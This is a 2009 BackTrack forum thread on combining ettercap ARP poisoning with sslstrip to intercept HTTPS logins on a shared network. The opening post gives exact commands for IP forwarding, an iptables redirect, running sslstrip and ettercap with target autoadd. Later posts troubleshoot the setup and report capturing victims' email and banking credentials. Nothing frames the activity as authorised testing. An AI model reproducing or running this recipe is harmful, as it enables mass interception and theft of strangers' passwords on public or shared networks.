Ettercap & SslStrip (Attacking the Masses)

**htons139** · 04-23-2009, 12:27 PM

There are a couple of posts in here about using SSLstrip with arpspoof. This is working fine with my BT3 box but it has some drawbacks

1- Arpspoof works on one target at a time, so if you are on a busy DHCP network, you have to use something like "netdiscover" in the passive mode and manually arpspoof new targets on the run.

2-You can use:

# arpspoof -i eth0 -t 192.168.0.255 192.168.0.1

where you arp spoof the whole C class of your subnet but guess what? The gateway will display an IP conflict warining message.

3- Arpspoof is compiled with "eth0" as the device to use, even if you use "-i eth1" the attack will fail. You have to modify the arp.c file and compile arpspoof again to make it work on other NIC names or search for a compiled binary that has this issue resolved...

I would suggest following the following steps ( from the readme file included with the sslstrip package)

a)Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward

b) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

c) Run sslstrip with the command-line options you'd like.
python sslstrip.py -k -p -l <yourListenPort>

And instead of using arpsoof use ettercap

d) Run ettercap to redirect traffic to your machine
ettercap -i eth1 -Tq -M ARP /192.168.0.1/ // // -P autoadd

We are telling ettercap to use "eth1", with terminal and quiet mode "-Tq" and use the arp poisoning attack "-M ARP". 192.168.0.1 is the gateway IP address and finally we are using the plugin autoadd to add new targets "-P autoadd".

**kazalku** · 04-26-2009, 10:24 AM

Originally Posted by htons139

3- Arpspoof is compiled with "eth0" as the device to use, even if you use "-i eth1" the attack will fail. You have to modify the arp.c file and compile arpspoof again to make it work on other NIC names or search for a compiled binary that has this issue resolved...

Just an alternative idea to simplify things - I'm sure that we can rename "eth1/rausb0" to "eth0" with a simple one line command. I did it earlier, but can't remember now. It could be with iwpriv or iwconfig or ifconfig or something simple. Will this 'rename' solve this problem??

**htons139** · 04-26-2009, 01:12 PM

Quoting from drakoth777
{
check out

/etc/udev/rules.d

take a look at the network-devices.rules, each nic has it's own mac address that is tied to a certain interface name(eth0, eth1, etc) you can change all that in the network rules file.
}

If you get this working, you have to rename the eth0 to something else before renaming eth1 to eth0, on the practical level ettercap is the right tool. Or if arpspoof is easier for you, download the binary available in the forum. Search for "sslstrip & arpspoof"

**kazalku** · 04-26-2009, 02:12 PM

Thanks for the reply.... I don't mind using ettercap .... anyway...... for others information, the following code required slight change for me:

Originally Posted by htons139

c) Run sslstrip with the command-line options you'd like.
python sslstrip.py -K -P -l <yourListenPort>

It worked as:

Code:

python sslstrip.py -k -p -l <yourListenPort>

So, capital K & P were replaced by lower case.... btw i'm using BT3

**htons139** · 04-26-2009, 02:17 PM

Originally Posted by kazalku

Thanks for the reply.... I don't mind using ettercap .... anyway...... for others information, the following code required slight change for me:

It worked as:

Code:

python sslstrip.py -k -p -l <yourListenPort>

So, capital K & P were replaced by lower case.... btw i'm using BT3

welcome and yes, typing mistake, I corrected the initial post. cheers

**kazalku** · 04-26-2009, 05:54 PM

Not a problem at all......

OK, now some feedback on the efficiency of the script. I used BT3 as attacker & Vista Home SP1 as victim. After poisoning, BT3 can successfully capture mail user ID & passwords (like gmail.com, mail.com, yahoo.com) and internet banking ID & password (like lloydsTSB, Barclays, HSBC). However, the victim can't logon to internet bank account, even the 2nd secuirity check page does not come up. So, it seems that our online banking is still safe...... any comments?

**kazalku** · 06-29-2009, 08:25 PM

I think it has been patched in both firefox & ie. Anybody thinks different??

**imported_g0tmi1k** · 07-10-2009, 06:03 PM

Working for me:
2009-01-10
Firefox 3.5, Windows XP SP3
http://forums.remote-exploit.org/bac...ettercap+https

**dominatus** · 07-30-2009, 03:17 AM

Originally Posted by kazalku

Not a problem at all......

OK, now some feedback on the efficiency of the script. I used BT3 as attacker & Vista Home SP1 as victim. After poisoning, BT3 can successfully capture mail user ID & passwords (like gmail.com, mail.com, yahoo.com) and internet banking ID & password (like lloydsTSB, Barclays, HSBC). However, the victim can't logon to internet bank account, even the 2nd secuirity check page does not come up. So, it seems that our online banking is still safe...... any comments?

On top of banks (WellsFargo tested here) being secure, there is another "problem" with sslstrip. It should be using a favicon to put a fake "lock" symbol, ala SSL. However, the favicon is not on the web bar and some images have problems being sent to the victim's browser.

What do banks have running that other SSL sites don't?

**propercoil** · 08-12-2009, 12:57 AM

after failing with arpspoof - when i have eth1 and it only works with eth0 (otherwise it gives "arpspoof couldn't arp for host" error).

i tried ettercap and it works like a champ.
my victim's machine is xp sp3 with ie8. shows gmail accounts, bank accounts etc.

thanks for posting

BackTrack Linux - Penetration Testing Distribution

Thread: Ettercap & SslStrip (Attacking the Masses)

Thread Tools

Search Thread

Display

Hybrid View

Ettercap & SslStrip (Attacking the Masses)

Patched??

thanks

Posting Permissions